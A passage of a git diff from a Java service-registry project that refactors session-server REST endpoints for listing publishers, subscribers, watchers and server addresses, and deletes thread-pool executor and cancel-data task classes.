sessionDataStore.count(); - long countSubW = sessionWatchers.count(); + Map> serverList = new HashMap<>(); + + if (connectIds != null) { + connectIds.forEach( + connectId -> { + Map pubMap = sessionDataStore.queryByConnectId(connectId); + Map subMap = sessionInterests.queryByConnectId(connectId); + Map watcherMap = sessionWatchers.queryByConnectId(connectId); - return String.format("Subscriber count: %s, Publisher count: %s, Watcher count: %s", - countSub, countPub, countSubW); + Collection publishers = + pubMap != null && !pubMap.isEmpty() ? pubMap.values() : new ArrayList<>(); + Collection subscribers = + subMap != null && !subMap.isEmpty() ? subMap.values() : new ArrayList<>(); + Collection watchers = + watcherMap != null && !watcherMap.isEmpty() + ? watcherMap.values() + : new ArrayList<>(); + fillServerList(type, serverList, publishers, subscribers, watchers); + }); } - /** - * return true mean push switch on - */ - @GET - @Path("pushSwitch") - @Produces(MediaType.APPLICATION_JSON) - public Map getPushSwitch() { - Map resultMap = new HashMap<>(1); - resultMap.put("pushSwitch", !sessionServerConfig.isStopPushSwitch() ? "open" : "closed"); - return resultMap; + return serverList; + } + + @GET + @Path("/data/count") + @Produces(MediaType.APPLICATION_JSON) + public String getSessionDataCount() { + long countSub = sessionInterests.count(); + long countPub = sessionDataStore.count(); + long countSubW = sessionWatchers.count(); + + return String.format( + "Subscriber count: %s, Publisher count: %s, Watcher count: %s", + countSub, countPub, countSubW); + } + + /** return true mean push switch on */ + @GET + @Path("pushSwitch") + @Produces(MediaType.APPLICATION_JSON) + public Map getPushSwitch() { + Map resultMap = new HashMap<>(1); + resultMap.put("pushSwitch", !sessionServerConfig.isStopPushSwitch() ? "open" : "closed"); + return resultMap; + } + + @GET + @Path("getDataInfoIdList") + @Produces(MediaType.APPLICATION_JSON) + public Collection getDataInfoIdList() { + Collection ret = new HashSet<>(); + ret.addAll(sessionInterests.getDataInfoIds()); + ret.addAll(sessionDataStore.getDataInfoIds()); + return ret; + } + + @GET + @Path("checkSumDataInfoIdList") + @Produces(MediaType.APPLICATION_JSON) + public int checkSumDataInfoIdList() { + return getDataInfoIdList().hashCode(); + } + + private void fillServerList( + String type, + Map> serverList, + Collection publishers, + Collection subscribers, + Collection watchers) { + if (type != null && !type.isEmpty()) { + String inputType = type.toUpperCase(); + + switch (inputType) { + case PUB: + if (!CollectionUtils.isEmpty(publishers)) { + serverList.put(PUB, publishers); + } + break; + case SUB: + if (!CollectionUtils.isEmpty(subscribers)) { + serverList.put(SUB, subscribers); + } + break; + case WAT: + if (!CollectionUtils.isEmpty(watchers)) { + serverList.put(WAT, watchers); + } + break; + default: + if (!CollectionUtils.isEmpty(publishers)) { + serverList.put(PUB, publishers); + } + if (!CollectionUtils.isEmpty(subscribers)) { + serverList.put(SUB, subscribers); + } + if (!CollectionUtils.isEmpty(watchers)) { + serverList.put(WAT, watchers); + } + break; + } + + } else { + if (publishers != null) { + serverList.put(PUB, publishers); + } + if (subscribers != null) { + serverList.put(SUB, subscribers); + } + if (watchers != null) { + serverList.put(WAT, watchers); + } } + } + + @GET + @Path("{type}/serverList/query") + @Produces(MediaType.APPLICATION_JSON) + public List getServerListAll(@PathParam("type") String type) { + List serverList = new ArrayList<>(); + if (type != null && !type.isEmpty()) { + String inputType = type.toUpperCase(); - private void fillServerList(String type, - Map> serverList, - Collection publishers, - Collection subscribers, Collection watchers) { - if (type != null && !type.isEmpty()) { - String inputType = type.toUpperCase(); - - switch (inputType) { - case PUB: - if (!CollectionUtils.isEmpty(publishers)) { - serverList.put(PUB, publishers); - } - break; - case SUB: - if (!CollectionUtils.isEmpty(subscribers)) { - serverList.put(SUB, subscribers); - } - break; - case WAT: - if (!CollectionUtils.isEmpty(watchers)) { - serverList.put(WAT, watchers); - } - break; - default: - if (!CollectionUtils.isEmpty(publishers)) { - serverList.put(PUB, publishers); - } - if (!CollectionUtils.isEmpty(subscribers)) { - serverList.put(SUB, subscribers); - } - if (!CollectionUtils.isEmpty(watchers)) { - serverList.put(WAT, watchers); - } - break; - } - - } else { - if (publishers != null) { - serverList.put(PUB, publishers); - } - if (subscribers != null) { - serverList.put(SUB, subscribers); - } - if (watchers != null) { - serverList.put(WAT, watchers); - } - } + switch (inputType) { + case SESSION: + serverList = getSessionServerList(); + break; + case DATA: + serverList = getDataServerList(); + break; + case META: + serverList = getMetaServerLeader(); + break; + default: + serverList = new ArrayList<>(); + break; + } } -} \ No newline at end of file + return serverList; + } + + public List getSessionServerList() { + return mataNodeService.getSessionServerList(sessionServerConfig.getSessionServerRegion()); + } + + public List getDataServerList() { + return new ArrayList<>(mataNodeService.getDataServerList()); + } + + public List getMetaServerLeader() { + return Lists.newArrayList(mataNodeService.getMetaServerLeader()); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/SessionOpenResource.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/SessionOpenResource.java index f0ce93c22..ea9141c69 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/SessionOpenResource.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/resource/SessionOpenResource.java @@ -16,74 +16,86 @@ */ package com.alipay.sofa.registry.server.session.resource; -import com.alipay.sofa.registry.common.model.Node.NodeType; +import com.alipay.sofa.registry.common.model.slot.Slot; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.node.NodeManagerFactory; -import com.alipay.sofa.registry.server.session.node.SessionNodeManager; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.util.ParaCheckUtil; import com.google.common.base.Joiner; -import org.apache.commons.lang.StringUtils; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.ws.rs.GET; -import javax.ws.rs.Path; -import javax.ws.rs.Produces; -import javax.ws.rs.QueryParam; -import javax.ws.rs.core.MediaType; -import java.util.ArrayList; import java.util.List; import java.util.stream.Collectors; +import javax.ws.rs.*; +import javax.ws.rs.core.MediaType; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: SessionOpenResource.java, v 0.1 2018-03-21 11:06 shangyu.wh Exp $ */ @Path("api/servers") public class SessionOpenResource { - @Autowired - private SessionServerConfig sessionServerConfig; + @Autowired private SessionServerConfig sessionServerConfig; - @GET - @Path("query.json") - @Produces(MediaType.APPLICATION_JSON) - public List getSessionServerListJson(@QueryParam("zone") String zone) { + @Autowired private MetaServerService metaNodeService; - List serverList = new ArrayList<>(); - NodeManager nodeManager = NodeManagerFactory.getNodeManager(NodeType.SESSION); + @Autowired private SlotTableCache slotTableCache; - if (StringUtils.isEmpty(zone)) { - zone = sessionServerConfig.getSessionServerRegion(); - } + @GET + @Path("query.json") + @Produces(MediaType.APPLICATION_JSON) + public List getSessionServerListJson(@QueryParam("zone") String zone) { + if (StringUtils.isBlank(zone)) { + zone = sessionServerConfig.getSessionServerRegion(); + } - if (StringUtils.isNotBlank(zone)) { - zone = zone.toUpperCase(); - } + if (StringUtils.isNotBlank(zone)) { + zone = zone.toUpperCase(); + } + return getSessionServers(zone); + } - if (nodeManager instanceof SessionNodeManager) { - SessionNodeManager sessionNodeManager = (SessionNodeManager) nodeManager; - serverList = sessionNodeManager.getZoneServerList(zone); + @GET + @Path("query") + @Produces(MediaType.TEXT_PLAIN) + public String getSessionServerList(@QueryParam("zone") String zone) { + return Joiner.on(";").join(getSessionServerListJson(zone)); + } - serverList = serverList.stream() - .map(server -> server + ":" + sessionServerConfig.getServerPort()) - .collect(Collectors.toList()); - } + @GET + @Path("alive") + public String checkAlive() { + return "OK"; + } - return serverList; - } + /** + * Get server list for current data center + * + * @return + */ + @GET + @Path("dataCenter") + @Produces(MediaType.APPLICATION_JSON) + public List getCurrentDataCenterServerList() { + return getSessionServers(null); + } - @GET - @Path("query") - @Produces(MediaType.TEXT_PLAIN) - public String getSessionServerList(@QueryParam("zone") String zone) { - return Joiner.on(";").join(getSessionServerListJson(zone)); - } + private List getSessionServers(String zone) { + List serverList = metaNodeService.getSessionServerList(zone); - @GET - @Path("alive") - public String checkAlive() { - return "OK"; - } + serverList = + serverList.stream() + .map(server -> server + ":" + sessionServerConfig.getServerPort()) + .collect(Collectors.toList()); + return serverList; + } -} \ No newline at end of file + @GET + @Path("slot") + @Produces(MediaType.APPLICATION_JSON) + public Slot getSlot(@QueryParam("dataInfoId") String dataInfoId) { + ParaCheckUtil.checkNotBlank(dataInfoId, "dataInfoId"); + return slotTableCache.getSlot(dataInfoId); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/ExecutorManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/ExecutorManager.java deleted file mode 100644 index cd11a6ae6..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/ExecutorManager.java +++ /dev/null @@ -1,293 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler; - -import com.alipay.sofa.registry.metrics.TaskMetrics; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.registry.Registry; -import com.alipay.sofa.registry.task.scheduler.TimedSupervisorTask; -import com.alipay.sofa.registry.util.NamedThreadFactory; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.HashMap; -import java.util.Map; -import java.util.concurrent.ArrayBlockingQueue; -import java.util.concurrent.ExecutorService; -import java.util.concurrent.LinkedBlockingQueue; -import java.util.concurrent.ScheduledExecutorService; -import java.util.concurrent.ScheduledThreadPoolExecutor; -import java.util.concurrent.SynchronousQueue; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: ExecutorManager.java, v 0.1 2017-11-28 14:41 shangyu.wh Exp $ - */ -public class ExecutorManager { - - private final ScheduledExecutorService scheduler; - - private final ThreadPoolExecutor fetchDataExecutor; - private final ThreadPoolExecutor standaloneCheckVersionExecutor; - private final ThreadPoolExecutor renNewDataExecutor; - private final ThreadPoolExecutor getSessionNodeExecutor; - private final ThreadPoolExecutor connectMetaExecutor; - private final ThreadPoolExecutor connectDataExecutor; - - private final ExecutorService checkPushExecutor; - private final ExecutorService pushTaskClosureExecutor; - private final ThreadPoolExecutor accessDataExecutor; - private final ThreadPoolExecutor dataChangeRequestExecutor; - private final ThreadPoolExecutor pushTaskExecutor; - private final ThreadPoolExecutor disconnectClientExecutor; - - private SessionServerConfig sessionServerConfig; - - @Autowired - private Registry sessionRegistry; - - @Autowired - private NodeManager sessionNodeManager; - - @Autowired - private NodeManager dataNodeManager; - - @Autowired - private NodeManager metaNodeManager; - - @Autowired - protected NodeExchanger metaNodeExchanger; - - @Autowired - private NodeExchanger dataNodeExchanger; - - private Map reportExecutors = new HashMap<>(); - - private static final String PUSH_TASK_EXECUTOR = "PushTaskExecutor"; - - private static final String ACCESS_DATA_EXECUTOR = "AccessDataExecutor"; - - private static final String DATA_CHANGE_REQUEST_EXECUTOR = "DataChangeRequestExecutor"; - - private static final String USER_DATA_ELEMENT_PUSH_TASK_CHECK_EXECUTOR = "UserDataElementPushCheckExecutor"; - - private static final String PUSH_TASK_CLOSURE_CHECK_EXECUTOR = "PushTaskClosureCheckExecutor"; - - private static final String DISCONNECT_CLIENT_EXECUTOR = "DisconnectClientExecutor"; - - public ExecutorManager(SessionServerConfig sessionServerConfig) { - - this.sessionServerConfig = sessionServerConfig; - - scheduler = new ScheduledThreadPoolExecutor(7, new NamedThreadFactory("SessionScheduler")); - - fetchDataExecutor = new ThreadPoolExecutor(1, 2/*CONFIG*/, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("SessionScheduler-fetchData")); - - renNewDataExecutor = new ThreadPoolExecutor(1, 2/*CONFIG*/, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("SessionScheduler-reNewData")); - - getSessionNodeExecutor = new ThreadPoolExecutor(1, 2/*CONFIG*/, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("SessionScheduler-getSessionNode")); - - standaloneCheckVersionExecutor = new ThreadPoolExecutor(1, 2/*CONFIG*/, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("SessionScheduler-standaloneCheckVersion")); - - connectMetaExecutor = new ThreadPoolExecutor(1, 2/*CONFIG*/, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("SessionScheduler-connectMetaServer")); - - connectDataExecutor = new ThreadPoolExecutor(1, 2/*CONFIG*/, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("SessionScheduler-connectDataServer")); - - accessDataExecutor = reportExecutors - .computeIfAbsent(ACCESS_DATA_EXECUTOR, k -> new SessionThreadPoolExecutor(ACCESS_DATA_EXECUTOR, - sessionServerConfig.getAccessDataExecutorMinPoolSize(), - sessionServerConfig.getAccessDataExecutorMaxPoolSize(), - sessionServerConfig.getAccessDataExecutorKeepAliveTime(), - TimeUnit.SECONDS, - new ArrayBlockingQueue<>(sessionServerConfig.getAccessDataExecutorQueueSize()), - new NamedThreadFactory("AccessData-executor", true))); - - pushTaskExecutor = reportExecutors.computeIfAbsent(PUSH_TASK_EXECUTOR, - k -> new ThreadPoolExecutor(sessionServerConfig.getPushTaskExecutorMinPoolSize(), - sessionServerConfig.getPushTaskExecutorMaxPoolSize(), - sessionServerConfig.getPushTaskExecutorKeepAliveTime(), TimeUnit.SECONDS, - new LinkedBlockingQueue<>(sessionServerConfig.getPushTaskExecutorQueueSize()), - new NamedThreadFactory("PushTask-executor", true))); - - TaskMetrics.getInstance().registerThreadExecutor(PUSH_TASK_EXECUTOR, pushTaskExecutor); - - dataChangeRequestExecutor = reportExecutors.computeIfAbsent(DATA_CHANGE_REQUEST_EXECUTOR, - k -> new SessionThreadPoolExecutor(DATA_CHANGE_REQUEST_EXECUTOR, - sessionServerConfig.getDataChangeExecutorMinPoolSize(), - sessionServerConfig.getDataChangeExecutorMaxPoolSize(), - sessionServerConfig.getDataChangeExecutorKeepAliveTime(), - TimeUnit.SECONDS, - new ArrayBlockingQueue<>(sessionServerConfig.getDataChangeExecutorQueueSize()), - new NamedThreadFactory( - "DataChangeRequestHandler-executor", true))); - - checkPushExecutor = reportExecutors - .computeIfAbsent(USER_DATA_ELEMENT_PUSH_TASK_CHECK_EXECUTOR, k -> new SessionThreadPoolExecutor( - USER_DATA_ELEMENT_PUSH_TASK_CHECK_EXECUTOR, 100, 600, 60L, - TimeUnit.SECONDS, - new LinkedBlockingQueue(100000), - new NamedThreadFactory("UserDataElementPushCheck-executor", true))); - - pushTaskClosureExecutor = reportExecutors - .computeIfAbsent(PUSH_TASK_CLOSURE_CHECK_EXECUTOR, k -> new SessionThreadPoolExecutor( - PUSH_TASK_CLOSURE_CHECK_EXECUTOR, 80, 400, 60L, - TimeUnit.SECONDS, - new LinkedBlockingQueue(10000), - new NamedThreadFactory("PushTaskClosureCheck", true))); - - disconnectClientExecutor = reportExecutors.computeIfAbsent(DISCONNECT_CLIENT_EXECUTOR,k->new SessionThreadPoolExecutor( - DISCONNECT_CLIENT_EXECUTOR, sessionServerConfig.getDisconnectClientExecutorMinPoolSize(), - sessionServerConfig.getDisconnectClientExecutorMaxPoolSize(), 60L, - TimeUnit.SECONDS, - new LinkedBlockingQueue(sessionServerConfig.getDisconnectClientExecutorQueueSize()), - new NamedThreadFactory("DisconnectClientExecutor", true))); - - } - - public void startScheduler() { - scheduler.schedule( - new TimedSupervisorTask("FetchData", scheduler, fetchDataExecutor, - sessionServerConfig.getSchedulerFetchDataTimeout(), TimeUnit.MINUTES, - sessionServerConfig.getSchedulerFetchDataExpBackOffBound(), - () -> sessionRegistry.fetchChangData()), - sessionServerConfig.getSchedulerFetchDataFirstDelay(), TimeUnit.SECONDS); - - scheduler.schedule( - new TimedSupervisorTask("ReNewData", scheduler, renNewDataExecutor, - sessionServerConfig.getSchedulerHeartbeatTimeout(), TimeUnit.SECONDS, - sessionServerConfig.getSchedulerHeartbeatExpBackOffBound(), - () -> sessionNodeManager.reNewNode()), - sessionServerConfig.getSchedulerHeartbeatFirstDelay(), TimeUnit.SECONDS); - - scheduler.schedule( - new TimedSupervisorTask("GetSessionNode", scheduler, getSessionNodeExecutor, - sessionServerConfig.getSchedulerGetSessionNodeTimeout(), TimeUnit.SECONDS, - sessionServerConfig.getSchedulerGetSessionNodeExpBackOffBound(), - () -> { - sessionNodeManager.getAllDataCenterNodes(); - dataNodeManager.getAllDataCenterNodes(); - metaNodeManager.getAllDataCenterNodes(); - }), - sessionServerConfig.getSchedulerGetSessionNodeFirstDelay(), TimeUnit.SECONDS); - - scheduler.schedule( - new TimedSupervisorTask("ConnectMetaServer", scheduler, connectMetaExecutor, - sessionServerConfig.getSchedulerConnectMetaTimeout(), TimeUnit.SECONDS, - sessionServerConfig.getSchedulerConnectMetaExpBackOffBound(), - () -> metaNodeExchanger.connectServer()), - sessionServerConfig.getSchedulerConnectMetaFirstDelay(), TimeUnit.SECONDS); - - scheduler.schedule( - new TimedSupervisorTask("ConnectDataServer", scheduler, connectDataExecutor, - sessionServerConfig.getSchedulerConnectDataTimeout(), TimeUnit.SECONDS, - sessionServerConfig.getSchedulerConnectDataExpBackOffBound(), - () -> dataNodeExchanger.connectServer()), - sessionServerConfig.getSchedulerConnectDataFirstDelay(), TimeUnit.SECONDS); - } - - public void stopScheduler() { - if (scheduler != null && !scheduler.isShutdown()) { - scheduler.shutdown(); - } - - if (standaloneCheckVersionExecutor != null && !standaloneCheckVersionExecutor.isShutdown()) { - standaloneCheckVersionExecutor.shutdown(); - } - - if (renNewDataExecutor != null && !renNewDataExecutor.isShutdown()) { - renNewDataExecutor.shutdown(); - } - if (fetchDataExecutor != null && !fetchDataExecutor.isShutdown()) { - fetchDataExecutor.shutdown(); - } - - if (getSessionNodeExecutor != null && !getSessionNodeExecutor.isShutdown()) { - getSessionNodeExecutor.shutdown(); - } - - if (connectMetaExecutor != null && !connectMetaExecutor.isShutdown()) { - connectMetaExecutor.shutdown(); - } - - if (connectDataExecutor != null && !connectDataExecutor.isShutdown()) { - connectDataExecutor.shutdown(); - } - - if (accessDataExecutor != null && !accessDataExecutor.isShutdown()) { - accessDataExecutor.shutdown(); - } - - if (pushTaskExecutor != null && !pushTaskExecutor.isShutdown()) { - pushTaskExecutor.shutdown(); - } - - if (checkPushExecutor != null && !checkPushExecutor.isShutdown()) { - checkPushExecutor.shutdown(); - } - - if (dataChangeRequestExecutor != null && !dataChangeRequestExecutor.isShutdown()) { - dataChangeRequestExecutor.shutdown(); - } - - if (pushTaskClosureExecutor != null && !pushTaskClosureExecutor.isShutdown()) { - pushTaskClosureExecutor.shutdown(); - } - - if (disconnectClientExecutor != null && !disconnectClientExecutor.isShutdown()) { - disconnectClientExecutor.shutdown(); - } - } - - public Map getReportExecutors() { - return reportExecutors; - } - - public ThreadPoolExecutor getAccessDataExecutor() { - return accessDataExecutor; - } - - public ThreadPoolExecutor getPushTaskExecutor() { - return pushTaskExecutor; - } - - public ExecutorService getCheckPushExecutor() { - return checkPushExecutor; - } - - public ThreadPoolExecutor getDataChangeRequestExecutor() { - return dataChangeRequestExecutor; - } - - public ExecutorService getPushTaskClosureExecutor() { - return pushTaskClosureExecutor; - } - - public ThreadPoolExecutor getDisconnectClientExecutor() { - return disconnectClientExecutor; - } - -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/SessionThreadPoolExecutor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/SessionThreadPoolExecutor.java deleted file mode 100644 index 18652a22c..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/SessionThreadPoolExecutor.java +++ /dev/null @@ -1,72 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.metrics.TaskMetrics; - -import java.util.concurrent.BlockingQueue; -import java.util.concurrent.RejectedExecutionException; -import java.util.concurrent.ThreadFactory; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: ThreadPoolExecutorSession.java, v 0.1 2018-10-11 19:07 shangyu.wh Exp $ - */ -public class SessionThreadPoolExecutor extends ThreadPoolExecutor { - - private static final Logger LOGGER = LoggerFactory.getLogger(SessionThreadPoolExecutor.class); - - private String executorName; - - public SessionThreadPoolExecutor(String executorName, int corePoolSize, int maximumPoolSize, - long keepAliveTime, TimeUnit unit, - BlockingQueue workQueue, ThreadFactory threadFactory) { - super(corePoolSize, maximumPoolSize, keepAliveTime, unit, workQueue, threadFactory); - this.executorName = executorName; - registerTaskMetrics(); - } - - private void registerTaskMetrics() { - - TaskMetrics.getInstance().registerThreadExecutor(executorName, this); - } - - @Override - public String toString() { - - return (new StringBuilder(executorName).append(" ").append(super.toString())).toString(); - } - - @Override - public void execute(Runnable command) { - - try { - super.execute(command); - } catch (Exception e) { - if (e instanceof RejectedExecutionException) { - LOGGER.error("Processor session executor {} Rejected Execution!command {}", this, - command.getClass(), e); - } - throw e; - } - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/AbstractSessionTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/AbstractSessionTask.java index 3135c1461..a0d6c5c1b 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/AbstractSessionTask.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/AbstractSessionTask.java @@ -19,47 +19,53 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.task.Retryable; - import java.util.UUID; import java.util.concurrent.atomic.AtomicInteger; /** - * * @author shangyu.wh + * @author kezhu.wukz * @version $Id: AbstractSessionTask.java, v 0.1 2018-01-15 14:35 shangyu.wh Exp $ */ public abstract class AbstractSessionTask implements SessionTask, Retryable { - private final static Logger LOGGER = LoggerFactory.getLogger(AbstractSessionTask.class, - "[Task]"); + private static final Logger LOGGER = LoggerFactory.getLogger(AbstractSessionTask.class, "[Task]"); - protected volatile String taskId; + protected volatile String taskId; - private AtomicInteger execCount = new AtomicInteger(1); + private AtomicInteger execCount = new AtomicInteger(1); - @Override - public synchronized String getTaskId() { - if (taskId == null) { - taskId = UUID.randomUUID().toString(); - } - - return taskId; + @Override + public synchronized String getTaskId() { + if (taskId == null) { + taskId = UUID.randomUUID().toString(); } - protected boolean checkRetryTimes(int configTimes) { - if (configTimes > 0) { - if (execCount.incrementAndGet() > configTimes) { - LOGGER.info(" info:{} retry times more than {}", this, configTimes); - return false; - } else { - return true; - } - } + return taskId; + } + + protected synchronized void setTaskId(String taskId) { + this.taskId = taskId; + } + + protected boolean checkRetryTimes(int configTimes) { + if (configTimes > 0) { + if (execCount.incrementAndGet() > configTimes) { + LOGGER.info(" info:{} retry times more than {}", this, configTimes); return false; + } else { + return true; + } } + return false; + } - @Override - public long getExpiryTime() { - return -1; - } -} \ No newline at end of file + protected int getExecCount() { + return execCount.get(); + } + + @Override + public long getExpiryTime() { + return -1; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/CancelDataTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/CancelDataTask.java deleted file mode 100644 index df380c58b..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/CancelDataTask.java +++ /dev/null @@ -1,105 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler.task; - -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.service.DataNodeService; -import com.alipay.sofa.registry.server.session.store.DataStore; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.server.session.store.Watchers; -import com.alipay.sofa.registry.task.listener.TaskEvent; - -import java.util.ArrayList; -import java.util.List; - -/** - * - * @author shangyu.wh - * @version $Id: CancelDataTask.java, v 0.1 2017-12-27 12:15 shangyu.wh Exp $ - */ -public class CancelDataTask extends AbstractSessionTask { - /** - * store subscribers - */ - private final Interests sessionInterests; - /** - * store publishers - */ - private final DataStore sessionDataStore; - - private final Watchers sessionWatchers; - /** - * transfer data to DataNode - */ - private final DataNodeService dataNodeService; - private final SessionServerConfig sessionServerConfig; - private List connectIds; - - public CancelDataTask(Interests sessionInterests, DataStore sessionDataStore, - Watchers sessionWatchers, DataNodeService dataNodeService, - SessionServerConfig sessionServerConfig) { - this.sessionInterests = sessionInterests; - this.sessionDataStore = sessionDataStore; - this.sessionWatchers = sessionWatchers; - this.dataNodeService = dataNodeService; - this.sessionServerConfig = sessionServerConfig; - } - - @Override - public void execute() { - if (connectIds.isEmpty()) { - throw new IllegalArgumentException("Input clientOff connectIds error!"); - } - - //remove local first,data node send error depend on other task check - List connectIdsPub = new ArrayList<>(); - for (String connectId : connectIds) { - - if (sessionDataStore.deleteByConnectId(connectId)) { - connectIdsPub.add(connectId); - } - sessionInterests.deleteByConnectId(connectId); - - sessionWatchers.deleteByConnectId(connectId); - } - - dataNodeService.clientOff(connectIdsPub); - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); - - if (obj instanceof List) { - this.connectIds = (List) obj; - } else { - throw new IllegalArgumentException("Input task event object error!"); - } - } - - @Override - public String toString() { - return "CANCEL_DATA_TASK{" + "taskId='" + getTaskId() + '\'' + ", connectIds=" + connectIds - + ", retry='" + sessionServerConfig.getCancelDataTaskRetryTimes() + '\'' + '}'; - } - - @Override - public boolean checkRetryTimes() { - //dataNodeService.clientOff will be retry all the failed - return false; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/Constant.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/Constant.java index b801489cf..32a03c392 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/Constant.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/Constant.java @@ -17,15 +17,14 @@ package com.alipay.sofa.registry.server.session.scheduler.task; /** - * * @author shangyu.wh * @version $Id: Constant.java, v 0.1 2018-08-17 17:07 shangyu.wh Exp $ */ public class Constant { - public final static String PUSH_CLIENT_SUBSCRIBERS = "PUSH_CLIENT_SUBSCRIBERS"; + public static final String PUSH_CLIENT_SUBSCRIBERS = "PUSH_CLIENT_SUBSCRIBERS"; - public final static String PUSH_CLIENT_DATUM = "PUSH_CLIENT_DATUM"; + public static final String PUSH_CLIENT_DATUM = "PUSH_CLIENT_DATUM"; - public final static String PUSH_CLIENT_URL = "PUSH_CLIENT_URL"; -} \ No newline at end of file + public static final String PUSH_CLIENT_URL = "PUSH_CLIENT_URL"; +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/DataChangeFetchCloudTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/DataChangeFetchCloudTask.java deleted file mode 100644 index d6a423adc..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/DataChangeFetchCloudTask.java +++ /dev/null @@ -1,306 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS 